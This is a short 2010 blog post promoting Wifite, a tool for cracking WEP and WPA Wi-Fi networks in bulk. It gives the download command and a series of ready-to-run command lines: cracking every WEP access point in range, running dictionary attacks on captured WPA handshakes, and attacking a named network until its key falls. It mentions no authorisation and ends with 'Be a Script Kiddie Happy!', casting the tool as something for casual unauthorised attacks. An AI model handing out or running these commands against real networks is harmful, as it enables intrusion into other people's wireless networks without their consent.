04 October 2010

Mass Wep/Wpa Cracker

Use Wifite tool To attack multiple WEP and WPA encrypted
networks at the same time. This tool is customizable to be automated
with only a few arguments.



Requirements:

    * Linux operating system.
    * Tested working with python 2.4.5 and python 2.5.2.
    * Wireless drivers patched for monitor mode and injection.
    * aircrack-ng (v1.1) suite.
    * xterm, python-tk module: required for GUI.
    * macchanger: also available via apt: apt-get install macchanger
    * pyrit: not required, optionally strips wpa handshake from .cap files



Execution:

Download the latest version:

wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

Change permissions to executable:

chmod +x wifite.py

Run:

python wifite.py

or, to see a list of commands with info:

./wifite.py -help



Examples:

The program contains lots of interactivity (waits for user input).
These command-line options are meant to make the program
100% automated.

To crack all WEP access points:

./wifite.py -all -nowpa

To crack all WEP access points with signal strength greater than
(or equal to) 50dB:

./wifite.py -p 50 -nowpa

To attack all access points, use 'darkc0de.lst' for cracking WPA handshakes:

./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst

To attack all WPA access points, but do not try to crack,
any captured handshakes are saved automatically:

./wifite.py -all -nowpa --dict none

To crack all WEP access points greater than 50dB in strength, giving
15 minutes for each WEP attack method, and send packets at 600 packets/sec:

./wifite.py --power 50 -wepw 15 -pps 600

To attempt to crack WEP-encrypted access point "2WIRE752"
endlessly, program will not stop until key is cracked or user
interrrupts with ^C):

./wifite.py -e "2WIRE752" -wepw 0



Be a Script Kiddie Happy!



biOos

No comments: